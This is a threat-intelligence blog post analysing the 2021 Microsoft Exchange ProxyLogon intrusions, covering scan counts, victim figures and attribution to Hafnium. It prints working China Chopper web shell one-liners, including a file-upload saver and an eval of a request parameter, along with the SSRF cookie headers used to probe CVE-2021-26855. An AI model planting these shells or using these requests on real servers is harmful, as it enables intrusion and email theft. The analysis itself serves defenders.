• Support
  • Login
  • Contact
  • Blog
  • Support
  • Login
  • Contact
  • Blog
SecurityScorecard SecurityScorecard
  • Products
    PRODUCTS
    • Security Ratings
      Identify security strengths across ten risk factors.
    • Security Data
      Get actionable, data-based insights.
    • Security Assessments
      Automate security questionnaire exchange.
    • Attack Surface Intelligence
      NEW
      On-demand contextualized global threat intelligence.
     
    • Automatic Vendor Detection
      Uncover your third and fourth party vendors.
    • Cyber Risk Quantification
      Translate cyber risk into financial impact.
    • Reporting Center
      Streamline cyber risk reporting.
    • SecurityScorecard Marketplace
      Discover and deploy pre-built integrations.
    BUY NOW
    • Compare All Plans
      Choose a plan that's right for your business.
    • Try Free Account
      Make informed decisions with confidence.
    • Buy Pro Now
      Add automated event responses.
    • Buy Business Now
      Expand on Pro with vendor management and integrations.
    • Request Enterprise Demo
      See the capabilities of an enterprise plan in action.
    icon__SSClogoMark icon__SSClogoMark

    Understand and reduce risk with SecurityScorecard.

    Free account sign up
  • Services
    SERVICES NEW
    • Digital Forensics & Incident Response
      Prepare to respond to any threat.
    • Third-Party Risk Management
      Reduce risk across your vendor ecosystem.
    • Cyber Risk Intelligence
      Partner to obtain meaningful threat intelligence.
     
    • Penetration Testing
      Uncover your vulnerabilities before an attack does.
    • Red Team
      Use scenarios to perform a simulated attack.
    • Tabletop Exercises
      Test your incident response plan & bolster your readiness.

    Under Cyber attack?

    Contact us for immediate support if you believe your organization is the victim of a cyber attack.

    Contact Cyber 911 Team
  • Solutions
    BY USE CASE
    • Compliance
    • Cyber Insurance
    • Digital Forensics
    • Due Diligence
    • Enterprise Cyber Risk
    • Executive-Level Reporting
    • Incident Response
    • Regulatory Oversight
    • Third-Party Risk
    BY INDUSTRY
    • Critical Infrastructure
    • Enterprise
    • Financial Services
    • Government
    • Healthcare
    • Insurance
    • Retail & Consumer
    • Technology
    Help your organization calculate its risk
    View All Solutions
  • Customers
    OUR CUSTOMERS
    • Customer Overview
      Trusted by companies of all industries and sizes.
    • Peer Reviews
      Find out what our customers are saying.
    SUCCESS AND SUPPORT
    • Customer Success
      Receive award-winning customer service.
    • Support
      Get your questions answered by our experts.
    COMMUNITY
    • SecurityScorecard Connect
      Engage in fun, educational, and rewarding activities.
    • Connect Login
      Join our exclusive online customer community.
    icon__SSClogoMark icon__SSClogoMark
    Understand and reduce risk with SecurityScorecard.
    Free account sign up
  • Partners

    Partner Program Overview

    Partner with SecurityScorecard and leverage our global cybersecurity ratings leadership to expand your solution, deliver more value, and win new business.

    Learn more
    • Locate a Partner
      Access our industry-leading partner network.
    • Value-Added Resellers
      Enter new markets, deliver more value, and get rewarded.
    • Managed Service Providers
      Meet customer needs with cybersecurity ratings.
    • ISAC Partner Program
      Learn more about the industries we support and ISAC member benefits.
    • Technology Alliances
      Access innovative solutions from leading providers.
    • SCORE Portal Login
      Use the SCORE Partner Program to grow your business.
    • SecurityScorecard Marketplace
      Find a trusted solution that extends your SecurityScorecard experience.

    Understand and reduce risk with SecurityScorecard.

    Free account sign up
  • Resources
    RESOURCES
    • Resource Center
      Explore our cybersecurity ebooks, data sheets, webinars, and more.
    • SecurityScorecard Blog
      Read the latest blog posts published weekly.
    • Research & Insights Center
      Access our research on the latest industry trends and sector developments.
    • SecurityScorecard Academy
      NEW
      Complete certification courses and earn industry-recognized badges.
    TOOLS AND DOCUMENTATION
    • Free Security Rating
      Get your free ratings report with customized security score.
    • Product Release Notes
      Visit our support portal for the latest release notes.
    • Free Account Signup
      Start monitoring your cybersecurity posture today.
    • Chrome Extension
      NEW
      Show the security rating of websites you visit.
    • Assessments ROI Calculator
      Calculate the ROI of automating questionnaires.
    Trust begins with transparency. Take a look at the data that drives our ratings.
    Learn more
  • Company

    Working at SecurityScorecard

    Committed to promoting diversity, inclusion, and collaboration–and having fun while doing it.

    Join our team
    • About Us
      SecurityScorecard is the global leader in cybersecurity ratings.
    • Leadership
      Meet the team that is making the world a safer place.
    • Press
      Explore our most recent press releases and coverage.
    • Events
      Join us at any of these upcoming industry events.
    • Policy Insights
      Raising the bar on cybersecurity with security ratings.
    • Careers
      APPLY TODAY
      Come join the SecurityScorecard team!
    • Contact Us
      Contact us with any questions, concerns, or thoughts.
    • Trust Portal
      Take an inside look at the data that drives our technology.
    • Help Center
      We are here to help with any questions or difficulties.
Request a demo
SecurityScorecard SecurityScorecard
  • Support
  • Login
  • Contact
  • Blog
  • Support
  • Login
  • Contact
  • Blog
SecurityScorecard SecurityScorecard
  • Products
    PRODUCTS
    • Security Ratings
      Identify security strengths across ten risk factors.
    • Security Data
      Get actionable, data-based insights.
    • Security Assessments
      Automate security questionnaire exchange.
    • Attack Surface Intelligence
      NEW
      On-demand contextualized global threat intelligence.
     
    • Automatic Vendor Detection
      Uncover your third and fourth party vendors.
    • Cyber Risk Quantification
      Translate cyber risk into financial impact.
    • Reporting Center
      Streamline cyber risk reporting.
    • SecurityScorecard Marketplace
      Discover and deploy pre-built integrations.
    BUY NOW
    • Compare All Plans
      Choose a plan that's right for your business.
    • Try Free Account
      Make informed decisions with confidence.
    • Buy Pro Now
      Add automated event responses.
    • Buy Business Now
      Expand on Pro with vendor management and integrations.
    • Request Enterprise Demo
      See the capabilities of an enterprise plan in action.
    icon__SSClogoMark icon__SSClogoMark

    Understand and reduce risk with SecurityScorecard.

    Free account sign up
  • Services
    SERVICES NEW
    • Digital Forensics & Incident Response
      Prepare to respond to any threat.
    • Third-Party Risk Management
      Reduce risk across your vendor ecosystem.
    • Cyber Risk Intelligence
      Partner to obtain meaningful threat intelligence.
     
    • Penetration Testing
      Uncover your vulnerabilities before an attack does.
    • Red Team
      Use scenarios to perform a simulated attack.
    • Tabletop Exercises
      Test your incident response plan & bolster your readiness.

    Under Cyber attack?

    Contact us for immediate support if you believe your organization is the victim of a cyber attack.

    Contact Cyber 911 Team
  • Solutions
    BY USE CASE
    • Compliance
    • Cyber Insurance
    • Digital Forensics
    • Due Diligence
    • Enterprise Cyber Risk
    • Executive-Level Reporting
    • Incident Response
    • Regulatory Oversight
    • Third-Party Risk
    BY INDUSTRY
    • Critical Infrastructure
    • Enterprise
    • Financial Services
    • Government
    • Healthcare
    • Insurance
    • Retail & Consumer
    • Technology
    Help your organization calculate its risk
    View All Solutions
  • Customers
    OUR CUSTOMERS
    • Customer Overview
      Trusted by companies of all industries and sizes.
    • Peer Reviews
      Find out what our customers are saying.
    SUCCESS AND SUPPORT
    • Customer Success
      Receive award-winning customer service.
    • Support
      Get your questions answered by our experts.
    COMMUNITY
    • SecurityScorecard Connect
      Engage in fun, educational, and rewarding activities.
    • Connect Login
      Join our exclusive online customer community.
    icon__SSClogoMark icon__SSClogoMark
    Understand and reduce risk with SecurityScorecard.
    Free account sign up
  • Partners

    Partner Program Overview

    Partner with SecurityScorecard and leverage our global cybersecurity ratings leadership to expand your solution, deliver more value, and win new business.

    Learn more
    • Locate a Partner
      Access our industry-leading partner network.
    • Value-Added Resellers
      Enter new markets, deliver more value, and get rewarded.
    • Managed Service Providers
      Meet customer needs with cybersecurity ratings.
    • ISAC Partner Program
      Learn more about the industries we support and ISAC member benefits.
    • Technology Alliances
      Access innovative solutions from leading providers.
    • SCORE Portal Login
      Use the SCORE Partner Program to grow your business.
    • SecurityScorecard Marketplace
      Find a trusted solution that extends your SecurityScorecard experience.

    Understand and reduce risk with SecurityScorecard.

    Free account sign up
  • Resources
    RESOURCES
    • Resource Center
      Explore our cybersecurity ebooks, data sheets, webinars, and more.
    • SecurityScorecard Blog
      Read the latest blog posts published weekly.
    • Research & Insights Center
      Access our research on the latest industry trends and sector developments.
    • SecurityScorecard Academy
      NEW
      Complete certification courses and earn industry-recognized badges.
    TOOLS AND DOCUMENTATION
    • Free Security Rating
      Get your free ratings report with customized security score.
    • Product Release Notes
      Visit our support portal for the latest release notes.
    • Free Account Signup
      Start monitoring your cybersecurity posture today.
    • Chrome Extension
      NEW
      Show the security rating of websites you visit.
    • Assessments ROI Calculator
      Calculate the ROI of automating questionnaires.
    Trust begins with transparency. Take a look at the data that drives our ratings.
    Learn more
  • Company

    Working at SecurityScorecard

    Committed to promoting diversity, inclusion, and collaboration–and having fun while doing it.

    Join our team
    • About Us
      SecurityScorecard is the global leader in cybersecurity ratings.
    • Leadership
      Meet the team that is making the world a safer place.
    • Press
      Explore our most recent press releases and coverage.
    • Events
      Join us at any of these upcoming industry events.
    • Policy Insights
      Raising the bar on cybersecurity with security ratings.
    • Careers
      APPLY TODAY
      Come join the SecurityScorecard team!
    • Contact Us
      Contact us with any questions, concerns, or thoughts.
    • Trust Portal
      Take an inside look at the data that drives our technology.
    • Help Center
      We are here to help with any questions or difficulties.
Request a demo
SecurityScorecard SecurityScorecard
BLOG

Microsoft Exchange Attack Surface Was Smaller and More Targeted Than Previously Thought

Ryan Sherstobitoff
03/15/2021

Updated December 24, 2021.

Executive Summary

Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.


Although initially thought to have affected as many as 30,000-100,000 organizations, our analysis indicates that the number is far less than that. Using our proprietary technology to scan the internet for vulnerable, public-facing Microsoft Exchange servers revealed 2,500- 18,000 vulnerable public-facing servers worldwide, a majority of which are in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality by the perpetrators.

While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021 failure to install the necessary patch has left over 2,500 servers still vulnerable.

Other published assessments of the attack have concluded primary adversary for this attack according to open source information is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers, however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.

Background

A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day, or previously unknown, vulnerabilities that enabled the attackers to execute remote code to manipulate the victim’s systems.

The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack and learn more about the threat actors and identify any potential victims.

Key Findings

Updated December 24, 2021

  • Discovery of ‘in the wild’ exploit code written by Chinese-speaking authors on GitHub. These exploits give the attacker the ability to dump the email contents of the Exchange Server.
  • Despite early reports of 30-100,000 victims, we were only able to observe approximately 18,000 public-facing vulnerable servers, including instances of Outlook Web Access that are usually linked to internal Exchange servers. We are unable to explain the discrepancy without knowing more about the data upon which the original reporting relied.
  • While the majority of vulnerabilities were found in Europe, the Middle East, and Africa, the majority of victims were found in the United States with a similar number in Germany.
  • We were able to identify 302 compromised organizations in at least 10 different industry sectors. We managed to deduce the identity of 173 organizations. As a matter of policy, we do not name victims of attacks.
  • We found evidence that may indicate more than one attacker at work in the victims’ systems as it appears other cyber threats are rushing to exploit the vulnerabilities

Vulnerability Analysis

The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065 & CVE-2021-26855. These vulnerabilities are part of an exploitation chain that when executed successfully in succession allows the attacker to conduct remote code execution within the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.

In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of these vulnerabilities. We were able to find evidence that proof of concept code had been developed to utilize these exploits.

Exploit Code Discovery

During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.

Fig 1. Twitter posting (note screenshots have Chinese characters in them).

This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.

F 1.2 GitHub account belonging to author of email dumping Proof Of Concept

Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down, however other GitHub accounts are making reference to GreyOrder being the original author. We were able to find the original post by GreyOrder even though it was deleted through cached reference to the post.

Fig 1.3 CVEBase

Fig 1.4 POC discussion on GitHub

The following is what was found posted from GreyOrder on March 3, 2021, only to be later removed from repositories.

Fig 1.5 Original GitHub posting for GreyOrder POC exploit

GreyOrder discloses some of the conditions to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. In order to trigger the vulnerability, a few conditions have to exist.

  • The targeted Microsoft Exchange server must be a load balancing server (two or more servers must be used at the same time).
  • The FQDN of the targeted internal Microsoft Exchange server must be known. It can be captured via a NTLM type 2 message.
  • For email content retrieval, the target email address must be known. Email addresses can be directly enumerated.

The general behavior of this proof of concept exploit code is generally outlined below.

  • The script first checks if the server is vulnerable in the same way that Microsoft’s nmap script does, sending a request to

    https:///owa/auth/x.js with headers

    • Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;.
  • Then they obtain the FQDN by sending a NTLM type 2 message to

    https:///ews/exchange.asmx. they send XML SOAP requests to https:///ecp/temp.js with the following headers:

    • Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml

Fig 1.6 Proof of Concept Exploit Demonstration

We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.

Fig 1.7 GreyOrder GitHub

Scope and Impact

The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many actual on-premise Exchange servers are exposed given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis.

  • What is the total population of exposed Microsoft Exchange Servers regardless of version on the Internet during the time period of analysis? This enables us to make a general assessment about the potential attack surface.
    • Microsoft released a detection script (to our collective benefit) for identifying vulnerable on-prem Microsoft Exchange servers but then proceeded to update that script two times, first adding the ability to detect Exchange 2013 installations and later to better handle service redirects (httpd response code 301 and 302) after receiving feedback that there were false negatives in the scanning results.
  • From our analysis and scans, we believe significantly fewer than 30,000 organizations were affected. Our data shows 18,000 organizations may have been vulnerable to this attack. To date, we’ve been able to identify 302 unique organizations that were impacted.
  • How many Microsoft Exchange servers still remain unpatched to CVE-2021-26855? First, we wanted to clarify that we are only able to detect servers that are vulnerable to the Server Side Request Forgery (SSRF) Vulnerability. The other vulnerabilities are dependent upon this CVE being successfully exploited to execute arbitrary code. We believe as of March 15, 2021, that over 2,500 servers are still vulnerable.

What did we see?

Threat Actor

The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.

Attack Surface

Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that a majority predominantly appear in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as being still vulnerable or unpatched. We found less than 18,000 vulnerable public-facing servers world-wide through our research and analysis.

Discrepancy in Vulnerable Server numbers

We can’t definitively say what drove the initial reports of significantly more organizations being hacked. It may be based on internal Microsoft telemetry of Exchange servers sold, or it may include servers behind a firewall which we would not be able to observe. Our numbers represent the number of Exchange servers that we observed from the Internet which is less than 18,000. Without additional information about the data upon which those reports were based, we can only speculate as to the discrepancy. As our research continues we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.

Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)

Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)

Malware Involved

During our investigations, we focused on some of the technical aspects of the attacks such as the malware involved. We detected several malware files known as web shells related to this attack that were tagged as exploit CVE-2021-26855 & CVE-2021-27065. i.e. the web shells were specifically designed to be used with these vulnerabilities.

China Chopper

The adversary used the China Chopper web shell in this targeted attack.

The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a Graphical User Interface that provides an interface with the server-side component. Unlike other web shells that provide an HTML interface on the hacked server so that the attacker can interact with it when visiting the webpage containing the China Chopper web shell, no content is shown. Therefore, the attacker needs to use the client-side in order to interact with the China Chopper web shell. The client-side component provides the following capabilities on the affected server:

  • file management
  • database management
  • virtual terminal

The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.

The first type is injected in the ExternalUrl field of the OAB (Offline Address Book) files. It checks if there are any files uploaded with the request and if yes, it saves it locally as an independent ASPX file.

The following example has a hardcoded ASPX file name:

  • ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“<aspx_file_name>”));}}</script>

We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:

  • ExternalUrl: http://g/<script runat=””server””>protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[“”p””] , false, Encoding.Default);sw.Write(Request.Form[“”f””]);sw.Close();}</script>”

The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.

The second type is also injected in the ExternalUrl field of the OAB files, but the injected content is different. It reads the value of an HTTP parameter and executes it on the server. An example of such an web shell is:

  • http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“<parameter_name>”],”unsafe”);}</script>

Since the attacker chooses the value for <aspx_file_name> in the first case and <parameter_name> in the second case, it is possible that these different approaches may indicate the presence of two different attackers.

As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.

Since the web shell was injected into the OAB files which are configuration files containing information about the servers they are running on, we managed to obtain the list of domains for the infected servers. Some of them are local domains while others are public.

The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:

Fig 2 – Distribution of ChinaChopper web shell parameters

Apart from these, we observed two clusters of similarly-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server. We observed each of these parameter names were used only once. The first cluster has parameter values that look like these: rxDg52fHL9GW, WHotfJjxFadX, EiH4yV2WGYgc, while the second one: 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, ce62a4a53e118ff82150522c663ddae6.

A full example of an infected OAB file from an infected Microsoft Exchange server follows:

Full OAB file

Victimology

One objective of the analysis was to understand the victimology of this attack and determine if it aligns with a typical nation-state cyber offensive operation. We started with analyzing the discovered web shells and their capabilities, then we focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack. The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with the last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files. Additional research into the web shell dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerability was predominantly in EMEA.

Fig 2.1 Distribution of web shell Victims

While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.

Fig 2.2 Sector Victimology

We found cases in which the domains for the URLs specified in the OAB files are local and we wonder whether this means that there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.

Other web shells

In addition to China Chopper, we discovered other web shell code designed to check if products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on a condition of true [See below “if..fireeye…write 1”, “if..confer (CarbonBlack) write 2”, “if…crowdstrike…write3”]. We believe the attacker is likely collecting this information in an effort to understand victim environmental details. This web shell would allow for additional malware to be deployed to terminate the security software.

0ba9a76f55aaa495670d74d21850d0155ff5d6a5

The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.

Analysis of Competing Hypothesis

The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. There are multiple hypotheses that we rank different evidence against that either support or do not support that specific hypothesis.

Hypotheses

Evidence that supports

Evidence that disproves

30,000 to 100,000 Microsoft Exchange servers are compromised

  • Discovery of 302 unique victims
  • Total population of on-premise vulnerable Microsoft Exchange servers exposed to the internet is less than 18,000
  • Media articles do not provide direct verifiable evidence that supports the exact number of victims or the exact number of vulnerable organizations

GreyOrder is a member of Hafnium

  • Chinese speaking
  • Minimal activity on GitHub
  • Directly involved in the development of proof of concept RCE exploit code related to this attack

  • No direct attribution to specific attacks
  • No direct history of malicious activity

Techniques, Tactics & Procedures support a Nation State cyber offensive operation

  • Low number of discovered victims
  • Public reporting supports Hafnium being the initial threat actor
  • Vulnerable numbers of servers are less than 18,000
  • Usage of 0-days (indicating of sophistication)
  • Most infections are in Germany and US while most vulnerable servers are located in Europe, Middle East, Africa (EMEA)

Conclusion

While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those sectors previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may be currently being exploited by ransomware criminals we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.

—

Download the post as a PDF.

Return to Blog
Join us in making the world a safer place.
FREE ACCOUNT SIGN UP
Products
Solutions
Customers
Marketplace
Partners
Resources
Company
Trust Portal
Security Ratings
Login
Blog
Contact
Careers

SecurityScorecard
Tower 49
12 E 49th St
Suite 15-100
New York, NY 10017

[email protected]

United States: (800) 682-1701
International: +1(646) 809-2166
Social-linkedin Social-facebook Twitter Instagram Youtube